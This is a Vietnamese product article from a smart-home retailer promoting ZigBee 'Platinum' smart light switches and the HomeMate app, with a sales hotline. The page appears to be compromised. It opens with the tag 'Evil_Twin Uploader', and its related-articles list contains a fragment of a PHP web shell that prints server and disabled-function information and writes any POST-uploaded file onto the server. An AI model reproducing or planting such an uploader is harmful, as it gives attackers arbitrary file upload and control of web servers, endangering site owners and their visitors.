Evil_Twin Uploader

Những lợi ích tuyệt vời của công tắc điện thông minh

Các thiết bị điện thông minh đang trở thành xu thế trong một cuộc sống hiện đại. Bạn đã nghe đến điện thoại thông minh, máy tính thông minh, máy lạnh thông minh, máy giặt thông minh. Vậy bạn đã từng nghĩ đến việc điều khiển tất cả các thiết bị trên chỉ trong một chiếc điện thoại. Công tắc điện thông minh là sản phẩm sẽ mang lại tiện ích như vậy. Ngoài ra, thiết bị này còn mang lại nhiều lợi ích tuyệt vời khác nữa. Cùng tìm hiểu qua bài viết sau.

Điều khiển tất cả trong một thiết bị

Ngồi tại ghế salon, điều chỉnh các kênh ti vi theo ý thích, đồng thời chỉnh điều hòa theo cảm nhận cơ thể, lại còn có thể kéo rèm vào ra khi nắng hắt hoặc gió lùa, bạn có bao giờ nghĩ tất cả những điều đó có thể được thực hiện cùng lúc, tại một vị trí nhất định và chỉ trên màn hình cảm ứng? Giờ đây, với công tắc điện thông minh, những điều tưởng chừng như không thể ấy lại được thực hiện một cách dễ dàng.

Những lợi ích tuyệt vời của công tắc điện thông minh

Thông qua phần mềm HomeMate tích hợp trên Smartphone và hệ thống mạng ZigBee tiên tiến, tất cả các chức năng được đồng bộ một cách dễ dàng. Bạn đọc có thể tham khảo bài viết Giải pháp nhà không dây thông minh sử dụng sóng ZigBee để hiểu thêm về công nghệ này.

Công tắc điện thông minh điều khiển các thiết bị khác một cách “thông minh”

Với công tắc điện thông minh, các thiết bị trong nhà bạn được quản lí một cách thông minh hơn rất nhiều mà không cần sự có mặt ngay lập tức của người dùng. Đèn sẽ được tắt từ xa khi không có người trong phòng hoặc trên lối đi cầu thang, rèm cửa được kéo lại khi trời hết nắng. Như vậy, bạn sẽ tiết kiệm điện và giữ cho thiết bị được bền hơn.

Những lợi ích tuyệt vời của công tắc điện thông minh

Mang lại không gian thiết kế hiện đại cho ngôi nhà bạn

Công tắc điện thông minh không những mang trong mình những lợi ích nổi trội mà còn được thiết kế một cách tinh tế và sang trọng. Với thiết kế cảm ứng, nút chạm nhẹ nhàng hoặc bộ điều khiển từ xa thuận tiện, công tắc điện có thể gắn âm tường để tạo nên vẻ sang trọng và hiện đại cho căn nhà. Nếu bạn là người ưa chuộng phong cách thiết kế tối giản thì công tắc điện thông minh là sự lựa chọn tuyệt vời.

Công tắc điện cảm ứng thông minh Platinum

Công tắc điện cảm ứng thông minh Platinum là thiết bị điều khiển không dây ZigBee, gồm nhiều loại trong đó có công tắc Bật / Tắt (một hay nhiều vị trí), công tắc điều chỉnh độ sáng, công tắc ngữ cảnh và công tắc rèm. Làm việc với các thiết bị ZigBee khác bằng cách kết nối với ZigBee Hub thông qua mạng Zigbee. Dễ dàng bật / tắt đèn của bạn chỉ bằng một cú chạm đơn giản qua ứng dụng HomeMate trên điện thoại thông minh hoặc máy tính bảng của bạn dù bạn ở bất cứ đâu.

công tắc điện thông minh Platinum

Thiết bị có ưu điểm tiết kiệm điện, thiết kế gọn nhẹ cùng nhiều tính năng thông minh đang được bán tại CÔNG TY CỔ PHẦN WONDER HOME VN (HomeSecurity) cùng nhiều chương trình khuyến mại hấp dẫn. Liên hệ Hotline 024.6688.7518 – 0963.493.586 để nhận báo giá công tắc thông minh Platinum nhanh nhất.

Bài viết liên quan

 • Công tắc thông minh ZigBee – Thiết bị điện an toàn cho nhà thông minh
 • Giải pháp nhà thông minh không dây sử dụng sóng Zigbee
 • ".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
  DisablePHP=".$disable_functions; print "\n"; echo"
  "; echo"
  "; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
  Social media & sharing icons powered by UltimatelySocial